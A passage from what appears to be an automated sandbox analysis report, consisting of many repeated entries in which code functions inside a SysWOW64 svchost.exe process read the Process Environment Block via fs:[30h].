            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272750 mov eax, dword ptr fs:[00000030h]1_2_03272750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272750 mov eax, dword ptr fs:[00000030h]1_2_03272750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B4755 mov eax, dword ptr fs:[00000030h]1_2_032B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032307AF mov eax, dword ptr fs:[00000030h]1_2_032307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E47A0 mov eax, dword ptr fs:[00000030h]1_2_032E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D678E mov eax, dword ptr fs:[00000030h]1_2_032D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]1_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]1_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]1_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE7E1 mov eax, dword ptr fs:[00000030h]1_2_032BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032347FB mov eax, dword ptr fs:[00000030h]1_2_032347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032347FB mov eax, dword ptr fs:[00000030h]1_2_032347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323C7C0 mov eax, dword ptr fs:[00000030h]1_2_0323C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B07C3 mov eax, dword ptr fs:[00000030h]1_2_032B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E627 mov eax, dword ptr fs:[00000030h]1_2_0324E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03266620 mov eax, dword ptr fs:[00000030h]1_2_03266620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268620 mov eax, dword ptr fs:[00000030h]1_2_03268620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323262C mov eax, dword ptr fs:[00000030h]1_2_0323262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE609 mov eax, dword ptr fs:[00000030h]1_2_032AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272619 mov eax, dword ptr fs:[00000030h]1_2_03272619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F866E mov eax, dword ptr fs:[00000030h]1_2_032F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F866E mov eax, dword ptr fs:[00000030h]1_2_032F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A660 mov eax, dword ptr fs:[00000030h]1_2_0326A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A660 mov eax, dword ptr fs:[00000030h]1_2_0326A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03262674 mov eax, dword ptr fs:[00000030h]1_2_03262674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324C640 mov eax, dword ptr fs:[00000030h]1_2_0324C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C6A6 mov eax, dword ptr fs:[00000030h]1_2_0326C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032666B0 mov eax, dword ptr fs:[00000030h]1_2_032666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234690 mov eax, dword ptr fs:[00000030h]1_2_03234690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234690 mov eax, dword ptr fs:[00000030h]1_2_03234690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B06F1 mov eax, dword ptr fs:[00000030h]1_2_032B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B06F1 mov eax, dword ptr fs:[00000030h]1_2_032B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0326A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A6C7 mov eax, dword ptr fs:[00000030h]1_2_0326A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6500 mov eax, dword ptr fs:[00000030h]1_2_032C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]1_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]1_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]1_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238550 mov eax, dword ptr fs:[00000030h]1_2_03238550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238550 mov eax, dword ptr fs:[00000030h]1_2_03238550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]1_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]1_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]1_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032545B1 mov eax, dword ptr fs:[00000030h]1_2_032545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032545B1 mov eax, dword ptr fs:[00000030h]1_2_032545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232582 mov eax, dword ptr fs:[00000030h]1_2_03232582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232582 mov ecx, dword ptr fs:[00000030h]1_2_03232582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03264588 mov eax, dword ptr fs:[00000030h]1_2_03264588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E59C mov eax, dword ptr fs:[00000030h]1_2_0326E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032325E0 mov eax, dword ptr fs:[00000030h]1_2_032325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C5ED mov eax, dword ptr fs:[00000030h]1_2_0326C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C5ED mov eax, dword ptr fs:[00000030h]1_2_0326C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E5CF mov eax, dword ptr fs:[00000030h]1_2_0326E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E5CF mov eax, dword ptr fs:[00000030h]1_2_0326E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032365D0 mov eax, dword ptr fs:[00000030h]1_2_032365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A5D0 mov eax, dword ptr fs:[00000030h]1_2_0326A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A5D0 mov eax, dword ptr fs:[00000030h]1_2_0326A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]1_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]1_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]1_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C427 mov eax, dword ptr fs:[00000030h]1_2_0322C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]1_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]1_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]1_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC460 mov ecx, dword ptr fs:[00000030h]1_2_032BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]1_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]1_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]1_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA456 mov eax, dword ptr fs:[00000030h]1_2_032EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322645D mov eax, dword ptr fs:[00000030h]1_2_0322645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325245A mov eax, dword ptr fs:[00000030h]1_2_0325245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032364AB mov eax, dword ptr fs:[00000030h]1_2_032364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032644B0 mov ecx, dword ptr fs:[00000030h]1_2_032644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BA4B0 mov eax, dword ptr fs:[00000030h]1_2_032BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA49A mov eax, dword ptr fs:[00000030h]1_2_032EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032304E5 mov ecx, dword ptr fs:[00000030h]1_2_032304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EB20 mov eax, dword ptr fs:[00000030h]1_2_0325EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EB20 mov eax, dword ptr fs:[00000030h]1_2_0325EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F8B28 mov eax, dword ptr fs:[00000030h]1_2_032F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F8B28 mov eax, dword ptr fs:[00000030h]1_2_032F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304B00 mov eax, dword ptr fs:[00000030h]1_2_03304B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322CB7E mov eax, dword ptr fs:[00000030h]1_2_0322CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4B4B mov eax, dword ptr fs:[00000030h]1_2_032E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4B4B mov eax, dword ptr fs:[00000030h]1_2_032E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]1_2_03302B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]1_2_03302B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]1_2_03302B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]1_2_03302B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6B40 mov eax, dword ptr fs:[00000030h]1_2_032C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6B40 mov eax, dword ptr fs:[00000030h]1_2_032C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FAB40 mov eax, dword ptr fs:[00000030h]1_2_032FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D8B42 mov eax, dword ptr fs:[00000030h]1_2_032D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228B50 mov eax, dword ptr fs:[00000030h]1_2_03228B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DEB50 mov eax, dword ptr fs:[00000030h]1_2_032DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240BBE mov eax, dword ptr fs:[00000030h]1_2_03240BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240BBE mov eax, dword ptr fs:[00000030h]1_2_03240BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4BB0 mov eax, dword ptr fs:[00000030h]1_2_032E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4BB0 mov eax, dword ptr fs:[00000030h]1_2_032E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]1_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]1_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]1_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EBFC mov eax, dword ptr fs:[00000030h]1_2_0325EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BCBF0 mov eax, dword ptr fs:[00000030h]1_2_032BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]1_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]1_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]1_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]1_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]1_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]1_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DEBD0 mov eax, dword ptr fs:[00000030h]1_2_032DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA24 mov eax, dword ptr fs:[00000030h]1_2_0326CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EA2E mov eax, dword ptr fs:[00000030h]1_2_0325EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03254A35 mov eax, dword ptr fs:[00000030h]1_2_03254A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03254A35 mov eax, dword ptr fs:[00000030h]1_2_03254A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BCA11 mov eax, dword ptr fs:[00000030h]1_2_032BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]1_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]1_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]1_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DEA60 mov eax, dword ptr fs:[00000030h]1_2_032DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032ACA72 mov eax, dword ptr fs:[00000030h]1_2_032ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032ACA72 mov eax, dword ptr fs:[00000030h]1_2_032ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240A5B mov eax, dword ptr fs:[00000030h]1_2_03240A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240A5B mov eax, dword ptr fs:[00000030h]1_2_03240A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238AA0 mov eax, dword ptr fs:[00000030h]1_2_03238AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238AA0 mov eax, dword ptr fs:[00000030h]1_2_03238AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286AA4 mov eax, dword ptr fs:[00000030h]1_2_03286AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304A80 mov eax, dword ptr fs:[00000030h]1_2_03304A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268A90 mov edx, dword ptr fs:[00000030h]1_2_03268A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326AAEE mov eax, dword ptr fs:[00000030h]1_2_0326AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326AAEE mov eax, dword ptr fs:[00000030h]1_2_0326AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]1_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]1_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]1_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230AD0 mov eax, dword ptr fs:[00000030h]1_2_03230AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03264AD0 mov eax, dword ptr fs:[00000030h]1_2_03264AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03264AD0 mov eax, dword ptr fs:[00000030h]1_2_03264AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B892A mov eax, dword ptr fs:[00000030h]1_2_032B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C892B mov eax, dword ptr fs:[00000030h]1_2_032C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE908 mov eax, dword ptr fs:[00000030h]1_2_032AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE908 mov eax, dword ptr fs:[00000030h]1_2_032AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC912 mov eax, dword ptr fs:[00000030h]1_2_032BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228918 mov eax, dword ptr fs:[00000030h]1_2_03228918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228918 mov eax, dword ptr fs:[00000030h]1_2_03228918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]1_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]1_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]1_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E mov eax, dword ptr fs:[00000030h]1_2_0327096E
